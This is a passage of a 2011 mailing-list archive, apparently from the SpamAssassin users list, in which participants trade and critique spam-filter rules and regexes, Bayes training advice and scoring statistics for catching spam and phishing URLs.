 recetly i been getting ALOT of these mail with the subjects like this
 contain a link to some scam/chinese crap factory

 i run the latest spamassassin along with amavis  but these mails keep 
 getting through any ideas?

 Re: YouWillNotBelieveYourPennisCanBbeThhatHardAndThick!GiveYouserlfATreat
 
 Since the longest (English) word I know has 28 letters
 (antidisestablishmentarianism), a private rule like:
 
 header VERY_LONG_WORD  Subject =~ /Re:\s+\S{29}/
 
 should catch that spam.

The multi-lingual dictionary that I use for this kind of purpose has 132
words that are 29+ characters.  Its longest word is 58 characters:
Llanfairpwllgwyngyllgogerychwyrndrobwantysiliogogogoch is a large
village on the Welsh island of Anglesey, see
http://en.wikipedia.org/wiki/Llanfairpwllgwyngyll for more.  Wikipedia
also notes a hill in New Zealand (short name Taumata) with an even
longer name.  The next longest word is
pneumonoultramicroscopicsilicovolcanoconiosis with 45 letters.  German
words, which I would have expected to take the cake, seem to be limited
to 35 or so letters.

Maybe try this instead:

header VERY_LONG_WORD  Subject =~ /Re:\s+\w(?![a-z]{40})[A-Za-z]{40}/


If anybody is interested in the dictionary I use, this should be enough
to replicate it:

$ ls -lGg |sed 's/^.* 1 //; s/ ... .. . / /'
total 18M
 17M all
  32 american-english - /usr/share/dict/american-english
  37 american-english-huge - /usr/share/dict/american-english-huge
  39 american-english-insane - /usr/share/dict/american-english-insane
 86K beale.wordlist.asc
  25 brazilian - /usr/share/dict/brazilian
  36 british-english-huge - /usr/share/dict/british-english-huge
  37 canadian-english-huge - /usr/share/dict/canadian-english-huge
 86K diceware.wordlist.asc
1.6K expurgated
  22 french - /usr/share/dict/french
  23 italian - /usr/share/dict/italian
 135 make-all
  23 ngerman - /usr/share/dict/ngerman
  23 ogerman - /usr/share/dict/ogerman
  23 spanish - /usr/share/dict/spanish
1.7M twl06.txt
  21 words - /usr/share/dict/words
$ cat make-all
#!/bin/sh

( cat `ls |grep -Ev '^all|.wordlist.asc'`
  sed -r '/^[0-9]{5}\s+/!d; s///; /\w/!d' *.wordlist.asc
) |sort -f |uniq -i all


Expurgated and twl06.txt are scrabble dictionaries that you'll have to
find specifically.  The .wordlist.asc files are for diceware.
Everything else came from a Debian package.  If you're not a word nut
like me, all you really need is the largest of each of the languages,
plus perhaps the standard English dictionary so you can determine if
something is an edge case.

This made it really easy for me to verify the cialis-in-word problem we
had here earlier; `grep -ci cialis all` currently counts 287 words.



signature.asc
Description: OpenPGP digital signature


Re: Spam

2011-03-30 Thread Adam Katz
On 03/30/2011 01:23 PM, RW wrote:
 A lot of these long words are rarely used in the wild - other than
 to say how long they are.
 
 The subjects have two separate characteristics: the length and the 
 number of lower to upper case transitions. I score them separately
 and use:
 
 header SUBJ_LONG_WORD Subject =~ /\b[^[:space:][:punct:]]{30}/
 header SUBJ_ODD_CASE  Subject =~ /(?:[[:lower:]][[:upper:]].{0,15}){3}/

(Personally, I'd prefer to limit it to letters rather than also
including numbers, underscores, and special characters.)

There's also exaggerated text like rg,
hahahahahahahahahahahahahahaha, loll!1one,
intentional strings like goodluckwiththat, and suffixes like
somethingorother (as in Mr. Rosensomethingorother).

I think my rule was a little more efficient at accomplishing something
similar.  John's was better named and is preferable except for the fact
that it still takes a while to parse (though at least it's limited to
just one line of each message).



signature.asc
Description: OpenPGP digital signature


Re: Obfuscating advanced fee scams with html attachements?

2011-03-29 Thread Adam Katz
On 03/28/2011 10:41 PM, Ned Slider wrote:
 NSL_RCVD_FROM_USER=1.226,
 
 Personally I score this rule way up and would have no hesitation
 with outright blocking at smtp level - it's as good an indication of
 spam as I've ever seen. Scoring at 6pts here and never seen a FP.

This is a good illustration of our corpus not being strong enough; the
current stats make that rule look useless since its lowest-scoring match
is seven points and it hits 0.0278% of all spam  10 points.
Furthermore, it has 99% overlap with FORGED_MUA_OUTLOOK, which hits far
more spam while maintaining a very low ham hit rate.

http://ruleqa.spamassassin.org/20110321/NSL_RCVD_FROM_USER/detail



signature.asc
Description: OpenPGP digital signature


Re: fake URL's in mail

2011-03-28 Thread Adam Katz
On 03/25/2011 04:59 AM, Matus UHLAR - fantomas wrote:
 Are there REALLY that MANY massmailers that can not post
 valid URL's? Something is rotten in the state od Denmark...

Yes.  Here is an example of ham in this category (obfuscated from an
opt-in newsletter I received a few days ago):

 .. you can do so on my website at: www.example.org
 [http://r20.rs6.net/tn.jsp?llr=t3gsdecfbet=1204949082340s=635e=001QT_SegTbXU1N7K_IcTndRqXABrEhqSbxbIYhGmFwcCswh8kkaQwhQAma4PuTWPg1awoSp0UNBpvRfUEVliJItwZU4La1KsxUcV_nET7t-EcK0AEUgxApBBjsSLSUbjQZ4HxS17k1-0U=]
 or in the mail at ...

This is not uncommon.  I've seen it in surveys sent as follow-ups to
orders, in newsletters, in ha ha you didn't opt out ads from companies
I previously had business with, and I'm sure a few other examples.
Shortened URLs are also used for this.

(I've never understood why they don't use a hash table for those
tracking URLs so that they don't get truncated...)

 On 23/03/2011 4:36 PM, Adam Katz wrote:
 Even with such a mechanism in place, it unduly penalizes the 
 little guys.

On 03/25/2011 05:00 AM, Matus UHLAR - fantomas wrote:
 even little guys should be able to send correct URLs

Those are correct URLs.  They merely track subscriber clicks in order to
get statistics and report them back to their customer (the newsletter
organizer or sales company).

 On 23.03.11 16:42, Lawrence @ Rogers wrote:
 Agreed. It's just one of those impractical things and just ain't 
 worth the effort.
 
 you have never received phishing attack of your domain, did you?

If you intend this to target phishing, I would propose going the other
direction with it -- instead of needing to whitelist the hundreds to
thousands of sites that might do link tracking or another form of
redirection, go the other way and mark popular phishing targets for this
scan.

Another option is to use a shortened URL detector and a bulk mail
detector (like __NOT_A_PERSON) to cleanse the results, though I still
think it would be clunky and FP-ridden.



signature.asc
Description: OpenPGP digital signature


Re: fake URL's in mail

2011-03-23 Thread Adam Katz
On 03/23/2011 11:43 AM, Matus UHLAR - fantomas wrote:
 On 03/21/2011 09:37 AM, Matus UHLAR - fantomas wrote:
 Does anyone successfully use plugin or at least rules that
 catch fake URLs?

 On 21.03.11 13:36, Adam Katz wrote:
 __SPOOFED_URL, a rule already shipping with SA, does this.

 I know about the problem with legal mail and spoofed URL's. That's
 why I asked about plugin that would be able to accept whitelists.

That would require an ENORMOUS whitelist and very close attention to its
upkeep.  I do not see this as practical without using a URIBL-style
mechanism (which would also require high maintenance).  Even with such a
mechanism in place, it unduly penalizes the little guys.



signature.asc
Description: OpenPGP digital signature


Re: username in from address

2011-03-23 Thread Adam Katz
On 3/22/2011 1:16 PM, Mark Chaney wrote:
 Ever notice that a lot of spam seems to have your username in
 their from address? Such as an email sent TO b...@domain.com is
 FROM blah...@anotherdomain.com (notice 'blah' included in the
 from address).

On 3/22/2011 2:31 PM, Adam Katz wrote:
 somebody could throw something up in their sandbox, but we'd need
 the result from timing.log (not published) to properly gauge the
 results (assuming it even has a favorable hit rate and S/O).

Watch __TO_EQ_FROM_USR and __TO_EQ_FROM_USR_NN on ruleqa starting
tomorrow.  The latter rule ignores trailing numbers, e.g. From:
joh...@example.com matches To: j...@other.example.org as well as To:
john6143598435623...@unrealistic.example.net.

Assuming it performs decently, we'll have to examine its CPU performance
(which I can't do).

 It also doesn't address the abstraction that Mark was trying to
 share with us.  The real question is:  is this common in uncaught
 spam?

On 03/22/2011 07:09 PM, Ted Mittelstaedt wrote:
 Unfortunately it is very common on this mailing list to make the
 claim that oh, that [insert special case here] isn't a problem
 because our other filters are good enough to catch it when the
 insert special case is difficult to figure out how to program for.

Eh?  I don't see where you got that from; I see no mention of any
special cases (unless you're talking about overlap, which is a factor we
need to take more seriously).  I just wanted some nods from people with
good intuition on these things before bothering to try it since my
intuition is that it won't help.  No offense (nor elitism) intended.

 But the fact is that we are approaching the area of diminishing
 returns with the Spamassassin canned rulesets.

I used to think that.  Now I work at a company with a massive private
stock of SA rules that handily disproves it.  The biggest problem is
that it takes tons of automated systems plus a nontrivial number of
full-time rule writers to make it hum.

 You shouldn't be asking the question how much uncaught spam does
 this thing I think is an ugly hack would be good for
 
 You should be saying well, it will probably only catch 2% of the 
 uncaught spam - but if I add this ugly hack to that other ugly hack
 to that other ugly hack all of which only catch 2% of the uncaught
 spam - why then guess what now I'm making a real dent in the
 stuff!!!

So if gluing three ugly hacks together trigger on 2% of  5 point spam,
it's worthwhile?  I was avoiding specifics because I'm not sure of how
this will play out.  You were probably talking about three separate
hacks that each independently catch 2% of uncaught spam, working on the
assumption that there is minimal overlap.  Overlap is one of the GA's
biggest shortcomings.

My intuition is that this rule will be somewhere between
__TO_EQ_FROM_DOM (S/O 0.466, 10.5% spam, 2.8173% uncaught-spam*) and
__TO_EQ_FROM (S/O 0.879, 10.3% spam, 2.1365% uncaught-spam), probably
closer to _DOM.  Nice guess on the 2% figure!

* Uncaught-spam% was calculated from summing totals given by ruleqa's
score-map data for scores under 5.  Since __HAS_RCVD hits all but one
spam, I used its summed hits  5 as the divisor.

 The former attitude is your problem is an annoyance to me and I'll 
 try to avoid it by studying it to death the latter is how can I
 help you with your problem attitude.

Again, no offense intended.  Like points (and therefore FPs!),
inefficiencies add up when you have large volumes of rules, so we're
very sensitive about the efficiency of rules that aren't top shelf.  I
see no reason not to apply that same logic here.

As to studying things to death, I think it's a good mantra to tread
lightly (especially when armed with a big stick).

I've been discussing looking at the proposed pattern.  Everybody else
has been offering workarounds.  Both avenues have merit.


SA devs do more than spend our lives on this list.  There is a balance
of how much time we dawdle in uncertain pursuits.  Demanding our
attention and research is not terribly polite, especially when coupled
with insults.



signature.asc
Description: OpenPGP digital signature


Re: TAB_IN_FROM from g...@vger.kernel.org

2011-03-22 Thread Adam Katz
On 03/22/2011 12:58 PM, Greg Troxel wrote:
 I've been noticing that mail from g...@vger.kernel.org is getting lots
 of points, and this seems like a recent change.  Specifically, these
 rules are hitting on almost all messages:
 
 *  0.1 KB_DATE_CONTAINS_TAB KB_DATE_CONTAINS_TAB
 *  3.8 TAB_IN_FROM From starts with a tab
 
 I see that this has been brought up before:
 
https://issues.apache.org/SpamAssassin/show_bug.cgi?id=6429

Does ALL mail from that list trigger these rules, or just some?  Is the
User-Agent header always Gnus/5.11 (Gnus v5.11) Emacs/22.2 (gnu/linux)
when it triggers?

If you have examples of other User Agents, please post them to the bug.



signature.asc
Description: OpenPGP digital signature


Re: username in from address

2011-03-22 Thread Adam Katz
 On 3/22/2011 1:16 PM, Mark Chaney wrote:
 Ever notice that a lot of spam seems to have your username in their
 from address? Such as an email sent TO b...@domain.com is FROM 
 blah...@anotherdomain.com (notice 'blah' included in the from
 address). This appears to be the case with a large a majority of
 the spam that gets through my filters. Any ideas how to handle
 this? Would be nice to be able to add a score for matches like
 that.

This hasn't been common enough (in my experience) to justify either of
the two ways to match it (a plugin or else an ugly pair of multi-line
ALL header rules).  I suppose somebody could throw something up in their
sandbox, but we'd need the result from timing.log (not published) to
properly gauge the results (assuming it even has a favorable hit rate
and S/O).

On 03/22/2011 01:59 PM, Ted Mittelstaedt wrote:
 If this sort of thing bothers you then simply use a unique or close
 to unique username and then put a filter in your e-mail client.
 
 send mail from:
 
 markymarkythefunkyd...@northpole.com
 
 and your guaranteed that anyone mailing you with
 markymarkthefunkydude in any part of their sending e-mail address
 is a spammer, and it should be child's play to create a filter in
 even Outlook that will delete those messages.

That's an ugly workaround that will serve to annoy anybody he
corresponds with (especially if he's dictating his address at a party;
that doesn't fit on a napkin).  It also requires trashing an old email
address, which means alienating/losing old contacts.

It also doesn't address the abstraction that Mark was trying to share
with us.  The real question is:  is this common in uncaught spam?



signature.asc
Description: OpenPGP digital signature


Re: Regex Rule Help?

2011-03-21 Thread Adam Katz
On 03/21/2011 10:07 AM, Terry Carmen wrote:
 I'm trying to match any URL that points to a URL shortener.
 
 They typically consist of http(s) followed by a domain name,
 a slash and a small series of alphanumeric characters,
 *without a trailing / or file extension*.
 
 I seem to be having pretty good luck matching the URL, however I
 can't figure out how to make the regex explicity *not* match
 anything that ends in a slash or contains an extension.
 
 For example, I want to match http://asdf.ghi/j2kj4l23;, but not 
 http://asdf.ghi/j2kj4l23/abc.html; or http://asdf.ghi/j2kj4l23/;

In this specific case, I think you want a simple end-of-line indicator,

uri  ASDF_GHI_SHORT  m'^http://asdf\.ghi/[\w-]{1,12}$'i

In order to match  http://asdf.ghi/j2kj4l23#mno  you might want:

uri  ASDF_GHI_SHORT  m'^http://asdf\.ghi/[\w-]{1,12}(?:[^/.\w-]|$)'i

( I used m'' instead of // so I didn't have to escape the slashes.  Any
punctuation can be used in that manner, though the leading m is only
optional in m// ).

 I tried using the perl negative look-ahead as both : (?!/) and
 (?!\/) without success.

As to using a negative look-ahead operator:  Though I'm not exactly sure
about when it's needed, you sometimes have to put something after it,
like  /foo(?!bar)(?:.|$)/  ... this is not mentioned in the spec.



signature.asc
Description: OpenPGP digital signature


Re: fake URL's in mail

2011-03-21 Thread Adam Katz
On 03/21/2011 09:37 AM, Matus UHLAR - fantomas wrote:
 Does anyone successfully use plugin or at least rules that catch
 fake URLs?

 I mean URLs pointing to different address than they appear, like:
 
 a href=phishing.site/fake/webmailhttp://webmail.example.com//a

No plugin needed.  __SPOOFED_URL, a rule already shipping with SA, does
this.  Note that it FPs on a significant amount of marketing ham:

http://ruleqa.spamassassin.org/20110321-r1083702-n/__SPOOFED_URL/detail

  MSECSSPAM% HAM% S/ORANK   SCORE  NAME
  0   2.8104   5.9645   0.3200.44   (n/a)  __SPOOFED_URL

rawbody  __SPOOFED_URL  m/a\s[^]{0,99}\bhref=(?:3D)?.?(https?:[^'
]{8,30})[^]{0,99}(?:[^]{0,99}(?!\/a)[^]{1,99})*(?!\1)https?:\/\/[^]{5}/i



signature.asc
Description: OpenPGP digital signature


Re: sa-updates

2011-03-10 Thread Adam Katz
On 03/10/2011 07:59 AM, Adam Moffett wrote:
 I'd be happy to contribute, but we bounce or outright delete high
 scoring spam.
 
 After Reading these wiki articles: 
 http://wiki.apache.org/spamassassin/HandClassifiedCorpora 
 http://wiki.apache.org/spamassassin/CorpusCleaning
 I get the impression that they want a representative sample of your 
 spam, and i will skew things in a bad way if I only submit the spam
 that spamassassin already scored low.

What is your bounce/delete threshold?  If it's high enough, I would say
that the skew it presents to the scores would actually stand to help
more than hurt (as long as we still have plenty of other non-trap
sources that contribute un-capped spam).

I figure spam capped at 15+ points would be fine, but you'll need
developer consensus on that.



signature.asc
Description: OpenPGP digital signature


Re: sa-updates

2011-03-10 Thread Adam Katz
On 03/10/2011 11:49 AM, Jason Bertoch wrote:
 On 2011/03/10 2:17 PM, Adam Katz wrote:
 I figure spam capped at 15+ points would be fine, but you'll need 
 developer consensus on that.
 
 
 Wouldn't spam already scored at 15+ be considered a little redundant
 to the corpus?  If not, I'm certain I could modify my config to keep
 a copy for processing in the mass checks.

You read me in reverse.  Spam capped at 15+ means spam that scores no
more than 15 points (since that was rejected or deleted).  If a minority
of our corpora are limited to lower-scoring spams, the genetic algorithm
would be slightly more biased in favor of the borderline cases and FNs.

As Darxus points out, if the majority of our corpora pruned out such
high-scoring messages, we would risk losing that certainty.



signature.asc
Description: OpenPGP digital signature


Re: The one year anniversary of the Spamhaus DBL brings a new zone

2011-03-08 Thread Adam Katz
On 03/08/2011 01:46 PM, Yet Another Ninja wrote:
 I'll never grasp why one would use one of those in mail.

Many shortened links allow you to anonymously track click-throughs
(clicks-through?), e.g. adding a plus sign to any bit.ly or j.mp URI
will bring anybody to the stats (and target) of the link.

Marketing emailers love using obfuscated URI redirectors to track users.
 I've always been confused about why the resulting tracking links are so
enormously long.

There are still plenty of email and IM clients out there that fail to
properly wrap enormously long URIs (such as google maps links).  I'm
actually surprised google doesn't use goo.gl or whatever for the Link
button in that interface.

I can't remember the last time I sent somebody a non-shortened link that
was over 150 characters.

 I thought there was consense to educate users *not* to visit links 
 they don't know and now we hear that something which hides potential
 danger is ok to be used?

The conscious effort to educate users about the targets of their links
is for phish rather than things that are introduced as new.



signature.asc
Description: OpenPGP digital signature


Describing AWL

2011-03-07 Thread Adam Katz
On 03/06/2011 11:33 AM, Karsten Bräckelmann wrote:
 On Sun, 2011-03-06 at 10:51 -0800, JP Kelly wrote:
 I just found an incoming message which is ham but marked as spam.
 It received a score of 14 because it is in the auto white-list.
 Shouldn't it receive a negative score?
 
 http://wiki.apache.org/spamassassin/AwlWrongWay
 
 Despite its name, the AWL is a score averager, based on the sender's
 history (limited by net-block).

I encountered that misconception so much that I altered its description
it in my local.cf:

describe AWLAdjust score towards average for this sender

As a reminder, SVN trunk uses:

describe AWLFrom: address is in the auto white-list


Even if we don't change what AWL means, we don't need to spell it out
as often.  Cleaning up the docs would certainly be useful, but simply
changing the description would cover most of the ground for us.



signature.asc
Description: OpenPGP digital signature


Re: low score for ($1.5Million)

2011-03-04 Thread Adam Katz
On 03/04/2011 04:11 PM, jdow wrote:
 We, it IS a small number by Nigerian scam standards. So why not
 a small score?
 
 - She ran that way FAST{O,o}

Likewise, I also enjoy weekends:

http://i.imgur.com/cxX6t.jpg  (mildly NSFW, though it's on my cube)


Re: low score for ($1.5Million)

2011-03-03 Thread Adam Katz
On 03/03/2011 04:40 PM, Dennis German wrote:
 Can someone comment on the low score assigned to the email located at
 
 http://www.cccu.us/hundredThousand.txt
 
 X-Spam-testscores: AWL=1.086,BAYES_00=-2.599,HTML_MESSAGE=0.001,
 MILLION_USD=1.528
 
 Is my bayes broken?

Not broken so much as poorly trained ... you cannot rely upon
SpamAssassin's autolearn functionality to do even a half-decent job.
See the man page on sa-learn and consider using spamassassin -r in place
of sa-learn --spam.

As to the rest of that mail, here's what SA trunk had to say about it
(excluding T_ rules, formatted to 72 chars):


Content analysis details:   (19.1 points, 5.0 required)

 pts rule name  description
 -- 
 0.0 FREEMAIL_FROM  Sender email is commonly abused enduser
mail provider
-0.0 RCVD_IN_DNSWL_NONE RBL: Sender listed at http://www.dnswl.org/
 2.2 FREEMAIL_ENVFROM_END_DIGIT Envelope-from freemail username ends in
digit
 2.5 MILLION_USDBODY: Talks about millions of dollars
 0.0 HTML_MESSAGE   BODY: HTML included in message
-0.1 DKIM_VALID_AU  Message has a valid DKIM or DK signature
 0.1 DKIM_SIGNEDMessage has a DKIM or DK signature
-0.1 DKIM_VALID Message has at least one valid DKIM
 1.0 HK_NAME_FM_MR_MRS  HK_NAME_FM_MR_MRS
 0.0 LOTS_OF_MONEY  Huge... sums of money
 3.5 FILL_THIS_FORM_LONGFill in a form with personal information
 1.0 MONEY_ATM_CARD Lots of money on an ATM card
 0.0 FILL_THIS_FORM Fill in a form with personal information
 2.8 FREEMAIL_REPLYTO   Reply-To/From or Reply-To/body contain
different freemails
 0.5 ADVANCE_FEE_3_NEW  Appears to be advance fee fraud
 1.0 ADVANCE_FEE_3_NEW_FORM Advance Fee fraud and a form
 1.0 ADVANCE_FEE_2_NEW_FRM_MNY Adv Fee fraud form and lots of money
 1.0 ADVANCE_FEE_3_NEW_FRM_MNY Adv Fee fraud form and lots of money
 1.0 ADVANCE_FEE_3_NEW_MONEY Advance Fee fraud and lots of money
 0.5 ADVANCE_FEE_2_NEW_MONEY Advance Fee fraud and lots of money
 0.4 FILL_THIS_FORM_FRAUD_PHISH Answer suspicious question(s)
 0.8 ADVANCE_FEE_2_NEW_FORM Advance Fee fraud and a form



signature.asc
Description: OpenPGP digital signature


Re: FRT_APPROV, FRT_EXPERIENCE FPs on French text

2011-02-28 Thread Adam Katz
On 02/28/2011 08:24 AM, Kris Deugau wrote:
 Mail reported by a customer as falsely tagged showed these rule hits.
 I've scored these rules down for now.
 
 Checking through the message text showed these likely matches:
 
 FRT_APPROV:approuvé
 
 FRT_EXPERIENCE:Expérience
 
 I'm pretty sure it's the accented 'e' in each word that's the trigger.

I agree.  I have fixed those two specific examples on SA trunk at svn
revision 1075489.

Please note that this sort of thing is better handled as a bug request,
and complaints directed at this list tend not to get such prompt
attention.  Try filing it in https://issues.apache.org/SpamAssassin/
next time.  (Final note:  it's better to note such a thing here than not
at all.)


 Given that, it's likely that similar rules will misfire on other
 French words that are essentially spelled the same as in English, but
 add a few accents on a vowel or two.

This does indeed seem likely.  Extra eyes from those of us versed in
non-English Latin-character languages would be quite helpful.

This could get you started:

grep -riE '^(raw|body|header.*subject).*\(\?![a-z?]{2,}\)' rules*

If you have GNU grep with libpcre, this is better (and colored):

grep --color -riP
  '^\s*(?:raw|body|header.*subject\s).*\(\?!\K[\w?]{2,}(?=\))' rules*

Use -h if you want to hide the file names.



signature.asc
Description: OpenPGP digital signature


Re: Should Emails Have An Expiration Date

2011-02-28 Thread Adam Katz
On 02/28/2011 12:53 PM, Gary Smith wrote:
 I think this would be a great idea.  Many end users never bother
 to delete old emails and on some, such as sales etc, there is no
 valid reason for them to countinue to waste disk and server space.
 
 http://www.zdnet.com/news/should-emails-have-an-expiration-date/6197888

 No since emails are now a large part of business processes and those
 business processes become your basis for legal protected, allowing
 the sender to say x-delete: 24 hours and then sues you for
 something for which you no longer have any proof would cause
 significant global catastrophe.

I do like the idea with respect to alerts; if email programs (especially
those on smart phones) would know to avoid alerting you of unread +
expired messages, that could be quite beneficial.  Especially if I could
set expiration times with thunderbird filters.

This becomes immediately useful for systems like logwatch, nagios, and
hudson as well as manual things like let's do lunch.


As to wasting space; I think this is never a valid excuse.  For
anything.  We are in an age of data parsing.  The more data, the better.
 Deleting things should be reserved for special cases, and forcing users
to delete things is never wise (especially given the ever-decreasing
cost of disk space).

Instead of deleting these things, there should be systems for
automatically recognizing them and shoving them into bins that would be
seen as acceptable losses if something were to go wrong (i.e. an area
disconnected from backups and excluded from searches by default).
Google's Priority Inbox is a great step in this direction.

Spam is a salient counter-example because it contains no value
whatsoever (well, unless you're in the spam-fighting business).
Anything else, even your aunt's all-caps derogatory jokes, has at least
a shred of value (it tells you she was awake at the time, the massive Cc
list might give you a relative's contact info, the absence of certain
people from the list might help determine when their falling-out
happened, etc).



signature.asc
Description: OpenPGP digital signature


Re: Decisions on how to handle mail from some domains

2011-02-25 Thread Adam Katz
On 02/23/2011 07:17 PM, Alex wrote:
 I'm wondering what people's opinion is on domains like 
 verticalresponse.com and vresp.com, and others, that seem to 
 distribute mail to anyone who wants to spend the money to buy a list 
 from them. Constantcontact might be in this same business, but it 
 seems like their reputation has slightly improved over the past few 
 months...
 
 While some of the mail from that sender seems legitimate, other mail 
 clearly isn't, but it has the same header as a legitimate mail,
 making it very difficult to properly train bayes or otherwise
 accurately determine that it's indeed spam and it should be
 discarded.
 
 I know this issue has been raised on this list before, but is there 
 any more information that people might have with regards to their 
 policy on mail such as this?

Those are called ESPs (Email Service Providers), and they vary from
complete spammers to companies that are genuinely trying to provide a
clean notification service.  Even the best of them fail at times, as has
been witnessed on this list.

Knujon has some unsubscribe voodoo in its reporting mechanism that can
probably help deal with the ESPs that try to be on the level.  The
others should hopefully fail to evade the DNSBLs.

To configure this within spamassassin, register for both knujon and
spamcop and configure your spamcop account to bcc knujon in its reports
(there are directions for this at knujon.org), then configure
spamassassin's spamcop plugin to use your spamcop account.  With this
set, each message you report with `spamassassin -r` will be reported to
spamcop and knujon (and Razor and Pyzor if they are enabled), and once
it hits knujon, you will be unsubscribed.



signature.asc
Description: OpenPGP digital signature


Re: Automatically extracted SpamAssassin FAQs

2011-02-23 Thread Adam Katz
(Professor Monperrus is Bcc'd)

On 02/22/2011 09:35 PM, Stefan Henß wrote:
 I'm currently doing research for my bachelor thesis on how to
 automatically extract FAQs from unstructured data.

Bravo, this is great work.  Release your work with a OSI-approved Free
Software license (I suggest the Affero GPL v3+) to encourage others to
follow your lead.  If you lose interest after your thesis completion or
you lose funding, this could save the project.

On 02/23/2011 05:54 AM, Alex responded:
 - How about a pointer to the original version, in case the reader
   wants to follow the whole thread?
 - How about a time/date stamp so users have an idea where it fits
   in context?

I would like to expand that:

There is a major issue here with blanket scraping of data without citing
your sources.  You need links to the original for further detail and to
assign credit, ideally to both the individuals involved as well as the
source (the list in our case).

Some of us get quite upset when our work is used without attribution.


Best of luck!



signature.asc
Description: OpenPGP digital signature


Re: using spamhaus droplist with sa ?

2011-02-22 Thread Adam Katz
Andreas Schulze began:
 http://www.spamhaus.org/faq/answers.lasso?section=DROP+FAQ 
 mention as very last point to use the Spamhaus Drop list with
 SA.

Yet Another Ninja continued:
 DROP is a tiny subset of the SBL designed for use by firewalls
 and routing equipment.
 
 Using it postqueue is pretty pointless as its basically a safe 
 subset of SBL

RW added:
 The suggestion is that it be scored higher for that reason.

 is anybody doing this and can explain it in detail ?

Yet Another Ninja answered:
 if that is what you wish, you can setup a local rbldnsd zone and
 query that.

That's nontrivial since there is no DNSBL serving it.  Setting one up
requires regularly scraping that data.  The same would go if you were to
create a SpamAssassin rule from it.

As a proof-of-concept, I have done the latter and added it as
KHOP_SPAMHAUS_DROP and KHOP_SPAMHAUS_DROP_LE (which checks only the
last-external relay) to my data-scraping sa-update channel
khop-sc-neighbors for testing.  It only runs in certain circumstances
and is scored very low as its still testing.  The resulting rule
contains a 5817-char regexp (from 3632 IP addresses in 402 CIDRs from a
6311-char source), which is more than twice the size of KHOP_SC_TOP200,
the channel's previously longest entry; twice the space for twice the
entries (18x the IPs).

Like KHOP_SC_TOP200, I optimized for performance by scoring it zero
(skipping its evaluation) in the presence of DNSEval:

scoreKHOP_SPAMHAUS_DROP 0.5 0 0.5 0
if (! plugin(Mail::SpamAssassin::Plugin::DNSEval) )
  score  KHOP_SPAMHAUS_DROP (0) (0.3) (0) (0.1)
endif

I've had this sitting in SVN for a few days now.  It hits almost
nothing, but it is actually interesting; only 72% of the broader rule's
hits are mirrored in RCVD_IN_SBL.  The _LE rule has 93% overlap with SBL
(I was expecting 99+%).

The biggest surprise was that both rules have almost their entire score
map matching corpus messages at or under 8 points.

   Corpus T_KHOP_SPAMHAUS_DROP T_KHOP_SPAMHAUS_DROP_LE
DateRev #spam  spam%  ham%  s/o rank SBL% spam% ham%   s/o rank SBL%
20110221 576k  .0323 .0030 .914  .54  72  .02170 1.000  .52  93
20110220 599k  .0314 .0031 .911  .54  72  .02090 1.000  .53  93
20110219 176k  .0996 .0041 .960  .55  72  .06600 1.000  .53  93
20110218 595k  .0315 .0031 .910  .54  72  (not added yet)

PMCs:  I'd love to see the timing.log output so as to better measure
these rules' merit.  Actually, why isn't that data public on ruleqa?  If
it's too time-consuming, restrict it to the weekly network runs.




signature.asc
Description: OpenPGP digital signature


Re: Tonns of russian DOT info spam

2011-02-21 Thread Adam Katz
On 02/20/2011 08:22 AM, Michelle Konzack wrote:
 http://www.electronica.tamay-dogan.net/spamassassin/

You need to train bayes.  Those messages all hit BAYES_00 when they
should be somewhat consistently hitting BAYES_80 or higher (after you
begin training them).  If you are not prepared to do this, you must
disable it as it is harming you in its current state.  If you are
prepared, wipe your bayes database and start from scratch, training as
much as possible.

Also, somewhere in your mail processing (maybe on Debian's side?), there
is an Amavisd-new scan which uses Razor2, showing us that these messages
are mostly registered there.  Enable the Razor2 plugin.

 RCVD_IN_DNSWL_MED 4.0
 
 Not very funny.

I'm not sure what you mean by this, but the default score should be -2.3
from this line:

score RCVD_IN_DNSWL_MED 0 -2.3 0 -2.3

If you let that go back to its default, train bayes, and configure
Razor2, you should be able to catch most if not all of that spam without
any of the potentially harmful measures you're considering.

Also, that DNSWL hit, which refers to the Debian mailing list itself,
can go away if you put 82.195.75.100 in your trusted_networks, though I
do not recommend that unless you also define your internal_networks (and
exclude it from there) since internal_networks otherwise defaults to
copying your trusted_networks.  There is some controversy in doing this,
but I'll leave others to describe it if they think it's important.

 Now I have increased URIBL_RHS_DOB to 5.0 because  I  do  not  know  a
 singel serious website which was registered and gone immediately online.

Not at the moment, but that's not something you check.  There is a
reason that rule is not scored very high.  Even URIBL_BLACK, which is
highly trusted, is only scored 1.8, so I would strongly suggest not
exceeding that mark, even if you are so convinced.

If you still want a custom rule, this should do:

header __LISTID_DEBIAN  List-Id =~ /\.lists\.debian\.org/
body   __RAJONAA_INFO   m' rajonaa: http://www\.[\w-]{0,50}\.info !$'
meta DEB_RAJONAA__LISTID_DEBIAN  __RAJONAA_INFO
describe DEB_RAJONAALatvian text with .info URI on Debian List
scoreDEB_RAJONAA3.0

Google translate seems to think the language is Latvian, but it does not
have a translation for the word rajonaa.  An online search shows that
it is used to indicate links on occasion, so we still need more context.

I've added this to my sandbox as well.



signature.asc
Description: OpenPGP digital signature


Re: Tonns of russian DOT info spam

2011-02-18 Thread Adam Katz
On 02/18/2011 01:46 PM, Michelle Konzack wrote:
 Since three weeks the Debian Mailinglist are hit be several 1000 russian
 DOTinfo spams and spamassassin score this crap with -4
 
 Does someone have a working rule for this crap?
 
 I tried :
 
 describe TD_INFO   dot info spam
 body __TD_INFO /http:\/\/.*\.info/i
 scoreTD_INFO   4.0
 
 but it does not work.

And thank goodness for that, your rule is WAY too broad to be useful
as it blocks the ENTIRE .info top-level domain (a very bad idea).

If you really want to do something that bold, at least limit it to the
debian list (note, that list-id is a guess, check your headers):

header __TD_DEB_LISTList-Id =~ /debian-user.lists.debian.org/
uri__TD_DOT_INFOm'^http://[^/]*\.info[/:?#]'i
meta   TD_DEB_INFO  __TD_DEB_LIST  __TD_DOT_INFO
score  TD_DEB_INFO  1.0

Check the SA rules it hits and add them as dependencies to that meta if
you want to increase the score; if it previously got a -4 score, it had
to hit some rule to do that.

Again, even this safer rule seems to be the wrong approach.  I suspect
you have a custom rule that is the source of the problem.  Can you post
the offending message to a pastebin?  The scoring breakdown would also
be useful (re-run the message with `spamassassin -t filename`)



signature.asc
Description: OpenPGP digital signature


Re: Tonns of russian DOT info spam

2011-02-18 Thread Adam Katz
 If you really want to do something that bold, at least limit it to the
 debian list (note, that list-id is a guess, check your headers):

 header __TD_DEB_LIST List-Id =~ /debian-user.lists.debian.org/
 uri__TD_DOT_INFO m'^http://[^/]*\.info[/:?#]'i

